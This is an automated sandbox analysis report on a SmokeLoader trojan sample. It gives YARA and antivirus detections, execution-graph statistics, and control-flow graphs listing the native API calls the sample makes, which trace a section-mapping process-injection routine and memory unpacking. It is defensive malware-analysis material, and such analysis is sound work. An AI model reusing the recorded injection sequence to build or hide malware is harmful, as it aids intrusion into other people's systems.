                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 74%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:40.7%
                                              Signature Coverage:44.9%
                                              Total number of Nodes:118
                                              Total number of Limit Nodes:4
                                              execution_graph 3250 402e40 3252 402e37 3250->3252 3253 402edf 3252->3253 3254 4018e6 3252->3254 3255 4018f5 3254->3255 3256 40192e Sleep 3255->3256 3257 401949 3256->3257 3259 40195a 3257->3259 3260 401514 3257->3260 3259->3253 3261 401524 3260->3261 3262 4015c4 NtDuplicateObject 3261->3262 3266 4016e0 3261->3266 3263 4015e1 NtCreateSection 3262->3263 3262->3266 3264 401661 NtCreateSection 3263->3264 3265 401607 NtMapViewOfSection 3263->3265 3264->3266 3268 40168d 3264->3268 3265->3264 3267 40162a NtMapViewOfSection 3265->3267 3266->3259 3267->3264 3269 401648 3267->3269 3268->3266 3270 401697 NtMapViewOfSection 3268->3270 3269->3264 3270->3266 3271 4016be NtMapViewOfSection 3270->3271 3271->3266 3367 401542 3368 40153b 3367->3368 3369 4015c4 NtDuplicateObject 3368->3369 3373 4016e0 3368->3373 3370 4015e1 NtCreateSection 3369->3370 3369->3373 3371 401661 NtCreateSection 3370->3371 3372 401607 NtMapViewOfSection 3370->3372 3371->3373 3375 40168d 3371->3375 3372->3371 3374 40162a NtMapViewOfSection 3372->3374 3374->3371 3376 401648 3374->3376 3375->3373 3377 401697 NtMapViewOfSection 3375->3377 3376->3371 3377->3373 3378 4016be NtMapViewOfSection 3377->3378 3378->3373 3314 620001 3315 620005 3314->3315 3320 62092b GetPEB 3315->3320 3317 620030 3322 62003c 3317->3322 3321 620972 3320->3321 3321->3317 3323 620049 3322->3323 3324 620e0f 2 API calls 3323->3324 3325 620223 3324->3325 3326 620d90 GetPEB 3325->3326 3327 620238 VirtualAlloc 3326->3327 3328 620265 3327->3328 3329 6202ce VirtualProtect 3328->3329 3331 62030b 3329->3331 3330 620439 VirtualFree 3334 6204be LoadLibraryA 3330->3334 3331->3330 3333 6208c7 3334->3333 3272 513ef6 3273 513f05 3272->3273 3276 514696 3273->3276 3277 5146b1 3276->3277 3278 5146ba CreateToolhelp32Snapshot 3277->3278 3279 5146d6 Module32First 3277->3279 3278->3277 3278->3279 3280 5146e5 3279->3280 3281 513f0e 3279->3281 3283 514355 3280->3283 3284 514380 3283->3284 3285 514391 VirtualAlloc 3284->3285 3286 5143c9 3284->3286 3285->3286 3286->3286 3335 620005 3336 62092b GetPEB 3335->3336 3337 620030 3336->3337 3338 62003c 7 API calls 3337->3338 3339 620038 3338->3339 3426 402dd0 3427 402ddc 3426->3427 3428 4018e6 8 API calls 3427->3428 3429 402edf 3427->3429 3428->3429 3348 4018f1 3349 4018f6 3348->3349 3350 40192e Sleep 3349->3350 3351 401949 3350->3351 3352 401514 7 API calls 3351->3352 3353 40195a 3351->3353 3352->3353 3413 401915 3414 4018c6 3413->3414 3415 40191a 3413->3415 3416 40192e Sleep 3415->3416 3417 401949 3416->3417 3418 401514 7 API calls 3417->3418 3419 40195a 3417->3419 3418->3419 3287 402f97 3288 4030ee 3287->3288 3289 402fc1 3287->3289 3289->3288 3290 40307c RtlCreateUserThread NtTerminateProcess 3289->3290 3290->3288 3403 402d7b 3404 402d38 3403->3404 3404->3403 3405 4018e6 8 API calls 3404->3405 3406 402dc7 3404->3406 3405->3406 3291 62003c 3292 620049 3291->3292 3304 620e0f SetErrorMode SetErrorMode 3292->3304 3297 620265 3298 6202ce VirtualProtect 3297->3298 3300 62030b 3298->3300 3299 620439 VirtualFree 3303 6204be LoadLibraryA 3299->3303 3300->3299 3302 6208c7 3303->3302 3305 620223 3304->3305 3306 620d90 3305->3306 3307 620dad 3306->3307 3308 620238 VirtualAlloc 3307->3308 3309 620dbb GetPEB 3307->3309 3308->3297 3309->3308 3354 4014fe 3355 401506 3354->3355 3356 401531 3354->3356 3357 4015c4 NtDuplicateObject 3356->3357 3361 4016e0 3356->3361 3358 4015e1 NtCreateSection 3357->3358 3357->3361 3359 401661 NtCreateSection 3358->3359 3360 401607 NtMapViewOfSection 3358->3360 3359->3361 3363 40168d 3359->3363 3360->3359 3362 40162a NtMapViewOfSection 3360->3362 3362->3359 3364 401648 3362->3364 3363->3361 3365 401697 NtMapViewOfSection 3363->3365 3364->3359 3365->3361 3366 4016be NtMapViewOfSection 3365->3366 3366->3361

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 123 40168d-401691 119->123 120->119 122 40162a-401646 NtMapViewOfSection 120->122 122->119 125 401648-40165e 122->125 123->105 126 401697-4016b8 NtMapViewOfSection 123->126 125->119 126->105 127 4016be-4016da NtMapViewOfSection 126->127 127->105 129 4016e0 call 4016e5 127->129
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 170 40168d-401691 166->170 167->166 169 40162a-401646 NtMapViewOfSection 167->169 169->166 172 401648-40165e 169->172 170->152 173 401697-4016b8 NtMapViewOfSection 170->173 172->166 173->152 174 4016be-4016da NtMapViewOfSection 173->174 174->152 176 4016e0 call 4016e5 174->176
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 214 40168d-401691 210->214 211->210 213 40162a-401646 NtMapViewOfSection 211->213 213->210 216 401648-40165e 213->216 214->196 217 401697-4016b8 NtMapViewOfSection 214->217 216->210 217->196 218 4016be-4016da NtMapViewOfSection 217->218 218->196 220 4016e0 call 4016e5 218->220
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 253 40168d-401691 249->253 250->249 252 40162a-401646 NtMapViewOfSection 250->252 252->249 255 401648-40165e 252->255 253->235 256 401697-4016b8 NtMapViewOfSection 253->256 255->249 256->235 257 4016be-4016da NtMapViewOfSection 256->257 257->235 259 4016e0 call 4016e5 257->259
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 293 40168d-401691 289->293 290->289 292 40162a-401646 NtMapViewOfSection 290->292 292->289 295 401648-40165e 292->295 293->275 296 401697-4016b8 NtMapViewOfSection 293->296 295->289 296->275 297 4016be-4016da NtMapViewOfSection 296->297 297->275 299 4016e0 call 4016e5 297->299
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 319 514696-5146af 320 5146b1-5146b3 319->320 321 5146b5 320->321 322 5146ba-5146c6 CreateToolhelp32Snapshot 320->322 321->322 323 5146d6-5146e3 Module32First 322->323 324 5146c8-5146ce 322->324 325 5146e5-5146e6 call 514355 323->325 326 5146ec-5146f4 323->326 324->323 329 5146d0-5146d4 324->329 330 5146eb 325->330 329->320 329->323 330->326
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005146BE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 005146DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Offset: 00502000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_502000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: d3a56f70c76ca7385493541348af3d08c52dbaa7e85a8dcb63c8bfe4e4efd841
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 19F062362007116BE7207AF5988DAAE7AECBF4A729F101528E656914C0DB70EC854E61

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 62003c-620047 1 620049 0->1 2 62004c-620263 call 620a3f call 620e0f call 620d90 VirtualAlloc 0->2 1->2 17 620265-620289 call 620a69 2->17 18 62028b-620292 2->18 23 6202ce-6203c2 VirtualProtect call 620cce call 620ce7 17->23 20 6202a1-6202b0 18->20 22 6202b2-6202cc 20->22 20->23 22->20 29 6203d1-6203e0 23->29 30 6203e2-620437 call 620ce7 29->30 31 620439-6204b8 VirtualFree 29->31 30->29 33 6205f4-6205fe 31->33 34 6204be-6204cd 31->34 37 620604-62060d 33->37 38 62077f-620789 33->38 36 6204d3-6204dd 34->36 36->33 40 6204e3-620505 36->40 37->38 43 620613-620637 37->43 41 6207a6-6207b0 38->41 42 62078b-6207a3 38->42 51 620517-620520 40->51 52 620507-620515 40->52 44 6207b6-6207cb 41->44 45 62086e-6208be LoadLibraryA 41->45 42->41 46 62063e-620648 43->46 48 6207d2-6207d5 44->48 50 6208c7-6208f9 45->50 46->38 49 62064e-62065a 46->49 53 6207d7-6207e0 48->53 54 620824-620833 48->54 49->38 55 620660-62066a 49->55 58 620902-62091d 50->58 59 6208fb-620901 50->59 60 620526-620547 51->60 52->60 61 6207e2 53->61 62 6207e4-620822 53->62 57 620839-62083c 54->57 56 62067a-620689 55->56 63 620750-62077a 56->63 64 62068f-6206b2 56->64 57->45 65 62083e-620847 57->65 59->58 66 62054d-620550 60->66 61->54 62->48 63->46 67 6206b4-6206ed 64->67 68 6206ef-6206fc 64->68 69 62084b-62086c 65->69 70 620849 65->70 72 6205e0-6205ef 66->72 73 620556-62056b 66->73 67->68 76 62074b 68->76 77 6206fe-620748 68->77 69->57 70->45 72->36 74 62056f-62057a 73->74 75 62056d 73->75 78 62059b-6205bb 74->78 79 62057c-620599 74->79 75->72 76->56 77->76 84 6205bd-6205db 78->84 79->84 84->66
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 332 620e0f-620e24 SetErrorMode * 2 333 620e26 332->333 334 620e2b-620e2c 332->334 333->334
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_620000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1763320106.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_50f86ebddd156619b173883981364d8955365d76d2c3a.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
